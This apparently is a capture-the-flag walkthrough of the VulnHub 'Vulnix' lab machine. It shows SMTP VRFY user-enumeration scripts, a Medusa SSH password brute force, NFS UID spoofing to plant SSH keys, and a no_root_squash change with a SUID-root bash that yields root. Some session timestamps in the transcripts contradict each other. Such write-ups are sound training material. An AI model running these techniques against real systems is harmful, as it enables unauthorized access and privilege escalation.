Welcome! In this post, we are going to be exploring ‘Vulnix’.

Vulnix is a machine from the people at VulnHub. Their aim is to provide materials that allow anyone to gain practical ‘hands-on’ experience in digital security, computer software & network administration.

Let’s begin, shall we?

Enumerating the target

An nmap scan to start things off:

root@kali:~# nmap 192.168.128.131

Starting Nmap 7.60 ( https://nmap.org ) at 2017-07-29 18:11 CDT
Nmap scan report for 192.168.128.131
Host is up (0.00024s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
79/tcp   open  finger
110/tcp  open  pop3
111/tcp  open  rpcbind
143/tcp  open  imap
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
993/tcp  open  imaps
995/tcp  open  pop3s
2049/tcp open  nfs
MAC Address: 00:0C:29:E3:A2:B1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 16.13 seconds

After some poking, I look to the SMTP service. What will it tell us?

I write a barebones script that uses the SMTP VRFY command to test for user accounts:

import socket

rhost = '192.168.128.131'
rport = 25

# Candidate user names, one per line (the Metasploit list shipped with Kali)
userfile = '/usr/share/wordlists/metasploit/unix_users.txt'
with open(userfile, 'r') as f:
    users = [u.strip() for u in f if u.strip()]

for u in users:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((rhost, rport))
    s.recv(1024)                                    # discard the 220 banner
    s.send(('VRFY ' + u + '\r\n').encode('ascii'))  # Python 3 sockets take bytes
    r = s.recv(1024).decode('ascii', errors='replace')
    s.close()
    if r[0:3] == '550':                             # 550 = no such user; skip it
        continue
    print(r.strip())                                # anything else: report the reply

Not very sophisticated, but this quickly identifies a number of user names. It relies on the server answering 550 for unknown names; a server that returns 252 for every name, or 502 because VRFY is disabled, reveals nothing. I will now use the names I’ve discovered as part of a brute force attack.

Note: Kali Linux also ships smtp-user-enum, which can enumerate with VRFY, EXPN or RCPT TO and offers more options.
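As an added example (my code, not the post’s script and nothing from VulnHub), here is a VRFY enumerator that reads the SMTP reply codes properly, sends every name over a single session instead of reconnecting each time, and can be driven offline from a server transcript. The target address is the walkthrough’s; the candidate list, the transcript and the function names are assumptions made for the demo.

```python
import io
import socket

# Added example, not code from the original post. Classifies VRFY replies by
# SMTP code instead of treating "anything but 550" as a hit, and keeps one
# session open for all names. RHOST/RPORT are the walkthrough's target; the
# candidate list below is constructed.
RHOST = '192.168.128.131'
RPORT = 25
CANDIDATES = ['root', 'user', 'vulnix', 'nobodyhere']

# Constructed server transcript (not captured from Vulnix), in the style of
# Postfix/Exim replies: one line per command the client sends.
SAMPLE_REPLIES = (
    '220 vulnix ESMTP Postfix (Ubuntu)\r\n'
    '250 vulnix\r\n'
    '250 2.1.5 root <root@vulnix>\r\n'
    '252 2.0.0 user\r\n'
    '252 2.0.0 vulnix\r\n'
    '550 5.1.1 <nobodyhere>: Recipient address rejected: User unknown\r\n'
    '221 2.0.0 Bye\r\n'
)


def classify_vrfy(reply):
    """Map the final line of a VRFY reply to a status string.

    RFC 5321: 250/251 confirm the mailbox; 252 means the server declines to
    verify but would accept mail (Postfix answers this for real local users
    while rejecting unknown ones with 550); 550/551/553 reject the name;
    500/502 mean VRFY itself is disabled, so enumeration is pointless.
    """
    code = reply[:3]
    if code in ('250', '251'):
        return 'exists'
    if code == '252':
        return 'likely'
    if code in ('550', '551', '553'):
        return 'missing'
    if code in ('500', '502'):
        return 'refused'
    return 'unknown'


def read_reply(rfile):
    """Read one SMTP reply, skipping '250-...' continuation lines; return the last line."""
    while True:
        line = rfile.readline()
        if not line:
            raise ConnectionError('server closed the connection')
        line = line.rstrip('\r\n')
        if len(line) < 4 or line[3] != '-':
            return line


def enumerate_users(users, rfile, wfile, helo='kali'):
    """VRFY each name over an open session; return {name: status}.

    rfile/wfile are text streams: a socket's makefile() pair for a live run,
    StringIO for offline use. Stops at the first 'refused' reply.
    """
    results = {}
    read_reply(rfile)                       # 220 banner
    wfile.write('HELO %s\r\n' % helo)
    wfile.flush()
    read_reply(rfile)                       # 250 greeting
    for user in users:
        wfile.write('VRFY %s\r\n' % user)
        wfile.flush()
        status = classify_vrfy(read_reply(rfile))
        if status == 'refused':
            break
        results[user] = status
    wfile.write('QUIT\r\n')
    wfile.flush()
    return results


def leaks_user_names(results):
    """True only if the server answered differently for different names.

    A server that says 252 (or 550) to everything gives away nothing.
    """
    statuses = set(results.values())
    return 'missing' in statuses and bool(statuses & {'exists', 'likely'})


def enumerate_from_transcript(server_replies, users):
    """Offline run over a constructed transcript; returns (results, bytes sent as text)."""
    rfile = io.StringIO(server_replies)
    wfile = io.StringIO()
    results = enumerate_users(users, rfile, wfile)
    return results, wfile.getvalue()


def enumerate_over_tcp(host=RHOST, port=RPORT, users=CANDIDATES):
    """Run the enumeration against a live server (needs network access)."""
    with socket.create_connection((host, port), timeout=10) as sock:
        rfile = sock.makefile('r', encoding='ascii', errors='replace', newline='\n')
        wfile = sock.makefile('w', encoding='ascii', newline='\n')
        return enumerate_users(users, rfile, wfile)


if __name__ == '__main__':
    hits, _ = enumerate_from_transcript(SAMPLE_REPLIES, CANDIDATES)
    for name, status in sorted(hits.items()):
        print('%-12s %s' % (name, status))
    print('server leaks user names:', leaks_user_names(hits))
```

Run as-is it works through the constructed transcript; call enumerate_over_tcp() to point it at a real target. The split between transport and logic is what makes the classifier testable, and leaks_user_names() is the check to run before trusting any "hits": a server that answers 252 to every name has not confirmed anything.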

The attack

I take the pilfered usernames and start trying to authenticate with them.

Medusa quickly uncovers a weak ssh password for the user ‘user’:

root@kali:~# medusa -h 192.168.128.131 -U users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -M ssh
[...]
ACCOUNT FOUND: [ssh] Host: 192.168.128.131 User: user Password: letmein [SUCCESS]

I use the discovered credential pair to access the victim machine:

root@kali:~# ssh user@192.168.128.131
user@192.168.128.131's password: 
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jul 29 18:46:04 BST 2017

  System load:  0.0              Processes:           92
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 13%              IP address for eth0: 192.168.128.131
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Sat Jul 29 17:09:57 2017 from 192.168.128.130
user@vulnix:~$ 

Local access achieved, now to get root.

Escalating privileges

One of the first things I check is whether or not ‘user’ can use sudo. Unfortunately the user is not a sudoer on the machine.

user@vulnix:~$ sudo -l
[sudo] password for user:
Sorry, user user may not run sudo on vulnix.

I dig around quite a bit and don’t really find much: there are no immediately obvious vulnerabilities. However, I do discover that ‘user’ is not alone on this machine: there is another account named ‘vulnix’.

Whenever I reach a point where I’m hitting a brick wall I like to take a step back. I go back over everything that I’ve done and ask myself, “What do I NOT see?” I try to retrace steps and find things I’ve overlooked.

I go back and examine the NFS service. Luckily, I find that it is exporting vulnix’s home directory to the world:

root@kali:~# showmount -e 192.168.128.131
Export list for 192.168.128.131
/home/vulnix *

Exploiting NFS

I create a temporary directory and mount the exposed share:

root@kali:~# mkdir /tmp/share
root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share -o nolock

But there is a problem:

root@kali:~# cd /tmp/share
bash: cd: /tmp/share: Permission denied

But, but I’m root!

After some research it turns out that the share most likely has ‘root_squash’ enabled: the server maps a client’s UID 0 to the anonymous user ‘nobody’, so root on Kali gets only the rights that ‘other’ has on the directory. With the default AUTH_SYS flavour the server otherwise trusts whatever UID the client presents. So if I create a user named ‘vulnix’ on my Kali machine, with the same UID as ‘vulnix’ on the victim machine, I should be able to access the directory.

I ssh back into the victim and get vulnix’s details:

user@vulnix:~$ id vulnix
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

Back on KALI I unmount the share, create the user, and then re-mount the share to test it out as ‘vulnix’:

root@kali:~# umount /tmp/share
root@kali:~# useradd -u 2008 vulnix
root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share -o nolock
root@kali:~# su vulnix
$ cd /tmp/share
$ ls -la
total 20
drwxr-x---  2 nobody 4294967294 4096 Sep  2  2012 .
drwxrwxrwt 15 root   root       4096 Sep 15 18:39 ..
-rw-r--r--  1 nobody 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 nobody 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 nobody 4294967294  675 Apr  3  2012 .profile
$ 

Excellent! (ls shows the owner as nobody/4294967294 rather than vulnix because the NFSv4 ID mapper on Kali cannot translate the owner name the server sends back; access is still decided by the numeric UID 2008 in the request, which is why the matching local user gets in.)

Now I create an SSH key pair and drop the public key into an authorized_keys file in the share, so that I can ssh in as vulnix:

root@kali:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:u3ckUaJq8Vl1UDHg+w/RXGU1Insr7l1h5yTE44suqbg root@kali
The key's randomart image is:
+---[RSA 2048]----+
|           .o=+o=|
|          ..=.ooo|
|         . =.o+ .|
|      . . o .+.+.|
|       +So o..+o=|
|      o o.o oo.*o|
|     .  .  =. +..|
|       . .=.o .o |
|      E.oo +..  .|
+----[SHA256]-----+
root@kali:~# cat ~/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcvpVMJsVDmCPoiMi/rKfrZTPsqL0aFtAMIOHQgcS89Ye0zp55iFAVpdmkoZQBuAidJ/fv4/7RgmArGWVIS6qvLdihxa39LL1y9GbMO9pS63t1ZQ8XYqXQR6SLLG0Ke4yKojCIxQm3lVAQH7nVRU6NNxYMmB2lkajsMlC7Xq6n4L0Xsj2tK33L0IHc+g4tSjKujx7hAjCP9PBwyMD7W4s22EoPYNS2aMqoRW+PUdHVaDtB8A1HSJg21sEyv1B1LM1FX7wiTp9xs88RUeVd5dFZoEocoOgeuTECZplLauRsudtI6cnBsIni6w8v7NeocDB3zuAUJD6zS5cP54LU7VeP root@kali
root@kali:~# su vulnix
$ cd /tmp/share
$ mkdir .ssh
$ cd .ssh
$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDcvpVMJsVDmCPoiMi/rKfrZTPsqL0aFtAMIOHQgcS89Ye0zp55iFAVpdmkoZQBuAidJ/fv4/7RgmArGWVIS6qvLdihxa39LL1y9GbMO9pS63t1ZQ8XYqXQR6SLLG0Ke4yKojCIxQm3lVAQH7nVRU6NNxYMmB2lkajsMlC7Xq6n4L0Xsj2tK33L0IHc+g4tSjKujx7hAjCP9PBwyMD7W4s22EoPYNS2aMqoRW+PUdHVaDtB8A1HSJg21sEyv1B1LM1FX7wiTp9xs88RUeVd5dFZoEocoOgeuTECZplLauRsudtI6cnBsIni6w8v7NeocDB3zuAUJD6zS5cP54LU7VeP root@kali' > authorized_keys
$ ^D
root@kali:~# ssh vulnix@192.168.128.131
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jul 29 19:06:50 BST 2017

  System load:  0.0              Processes:           92
  Usage of /:   90.2% of 773MB   Users logged in:     1
  Memory usage: 13%              IP address for eth0: 192.168.128.131
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)

I check vulnix’s sudo permissions and see they are restricted to editing /etc/exports:

vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ 

I use sudoedit to replace root_squash with no_root_squash in /etc/exports:

vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#  to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
vulnix@vulnix:~$ sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#  to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,no_root_squash)
vulnix@vulnix:~$

Unfortunately the NFS server only re-reads /etc/exports when told to (exportfs -ra, or a restart of nfs-kernel-server), and vulnix’s sudo rights cover neither, so it’s necessary to reboot the machine for the change to take effect.
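To make the root_squash mechanics concrete, the following added example (my code, not anything from the post) parses exports(5) lines, applies the squash rules and a POSIX traversal check to model what the server did with root’s and vulnix’s requests, and flags the two settings that made this box fall. The exports text and the home directory’s ownership and mode are taken from the walkthrough; the hardened line, the anonymous UID value and the function names are my assumptions, and the squash/permission logic is a simplified model of the kernel’s AUTH_SYS handling, not an NFS implementation.

```python
import re

# Added example, not from the original post: a small model of how an NFS
# server applies export options. Everything below parse_exports() is a
# simplified model of the kernel's AUTH_SYS behaviour, not an NFS server.
ANON_UID = 65534      # "nobody": what a squashed UID becomes (assumed default)
ANON_GID = 65534

# Excerpt of /etc/exports as shown in the walkthrough (comment lines kept)
VULNIX_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
#  to NFS clients.  See exports(5).
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/home/vulnix *(rw,root_squash)
"""
# The line after the sudoedit in the walkthrough
EXPLOITED_EXPORTS = "/home/vulnix *(rw,no_root_squash)\n"
# A safer line (constructed): keep root squashed, restrict the client range
HARDENED_EXPORTS = "/home/vulnix 192.168.128.0/24(rw,root_squash,no_subtree_check)\n"

# /home/vulnix as listed over the mount: drwxr-x--- owned by uid/gid 2008
HOME_OWNER, HOME_GROUP, HOME_MODE = 2008, 2008, 0o750

# One client spec: "host" or "host(opt,opt,...)"
_CLIENT_RE = re.compile(r'(\S+?)(?:\(([^)]*)\))?(?=\s|$)')


def parse_exports(text):
    """Parse exports(5) text into [(path, client, {option, ...}), ...].

    Skips comments and blank lines; a client with no parenthesised list gets
    an empty option set, i.e. the server defaults (ro, root_squash).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else '')
        for m in _CLIENT_RE.finditer(rest.strip()):
            opts = {o.strip() for o in (m.group(2) or '').split(',') if o.strip()}
            entries.append((path, m.group(1), opts))
    return entries


def effective_ids(uid, gid, opts):
    """Identity the server acts as for a request carrying uid/gid.

    root_squash is the default: UID 0 becomes the anonymous user. all_squash
    maps everyone; no_root_squash passes root through unchanged.
    """
    if 'all_squash' in opts:
        return ANON_UID, ANON_GID
    if uid == 0 and 'no_root_squash' not in opts:
        return ANON_UID, ANON_GID
    return uid, gid


def may_enter(uid, gid, owner, group, mode):
    """POSIX check for entering a directory: the matching class needs its x bit."""
    if uid == 0:
        return True
    if uid == owner:
        return bool(mode & 0o100)
    if gid == group:
        return bool(mode & 0o010)
    return bool(mode & 0o001)


def client_can_enter(uid, gid, opts, owner=HOME_OWNER, group=HOME_GROUP, mode=HOME_MODE):
    """Squash first, then check the directory's permission bits."""
    euid, egid = effective_ids(uid, gid, opts)
    return may_enter(euid, egid, owner, group, mode)


def audit_exports(text):
    """Flag the two settings that mattered here: world export and no_root_squash."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == '*':
            findings.append('%s: exported to every host (*)' % path)
        if 'no_root_squash' in opts:
            findings.append('%s (%s): no_root_squash, a remote root can plant SUID-root files'
                            % (path, client))
    return findings


if __name__ == '__main__':
    cases = (('original', VULNIX_EXPORTS), ('after sudoedit', EXPLOITED_EXPORTS),
             ('hardened', HARDENED_EXPORTS))
    for label, text in cases:
        _, client, opts = parse_exports(text)[0]
        print('%-15s client=%-18s root enters: %-5s uid 2008 enters: %-5s findings: %s'
              % (label, client, client_can_enter(0, 0, opts),
                 client_can_enter(2008, 2008, opts), audit_exports(text) or 'none'))
```

Run as-is it prints one line per exports variant: with the original line root is squashed and refused (the "Permission denied" above) while UID 2008 gets in, after the sudoedit root passes straight through, and the hardened line raises no findings. audit_exports(open('/etc/exports').read()) is the quick check to run on your own servers.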

After that’s done, I remount the share on Kali and copy a SUID-root /bin/bash into the directory. With root no longer squashed, the file is created on the server as UID 0 and keeps its SUID bit, so a nice comfy root shell is waiting for me when I ssh back to the host as ‘vulnix’. You could use any payload you like, as long as it is built for the target’s architecture (i686 here) and links against libraries the target actually has.

root@kali:~# mount -t nfs 192.168.128.131:/home/vulnix /tmp/share
root@kali:~# cp /bin/bash /tmp/share
root@kali:~# chmod 4755 /tmp/share/bash
root@kali:~# ls -al /tmp/share
drwxr-x---  2 nobody 4294967294 4096 May 16  2012 .
drwxrwxrwt 15 root   root       4096 May 16 18:39 ..
-rwsr-xr-x  1 root   root    1109694 May 16 19:22 bash
-rw-r--r--  1 nobody 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r--  1 nobody 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r--  1 nobody 4294967294  675 Apr  3  2012 .profile
root@kali:~# ssh vulnix@192.168.128.131
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

* Documentation:  https://help.ubuntu.com/

System information as of Tue May 16 04:41:47 GMT 2016

System load:  0.0              Processes:           90
Usage of /:   93.5% of 773MB   Users logged in:     0
Memory usage: 7%               IP address for eth0: 192.168.128.131
Swap usage:   0%

=> / is using 92.6% of 773MB

Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sat Jul 29 04:31:08 2017 from 192.168.128.130
vulnix@vulnix:~$ ls -al
vulnix@vulnix:~$ ./bash -p
./bash: /lib/i386-linux-gnu/libtinfo.so.5: no version information available (required by ./bash)
bash-4.4# whoami
root
bash-4.4# ls /root
trophy.txt
bash-4.4# cat /root/trophy.txt
cc614640424f5bd60ce5d5264899c3be 

Very nice.

Conclusion

WOW this one was quite challenging, but a lot of fun. I’ll look forward to doing more of these in the future.

Stay tuned!

EOF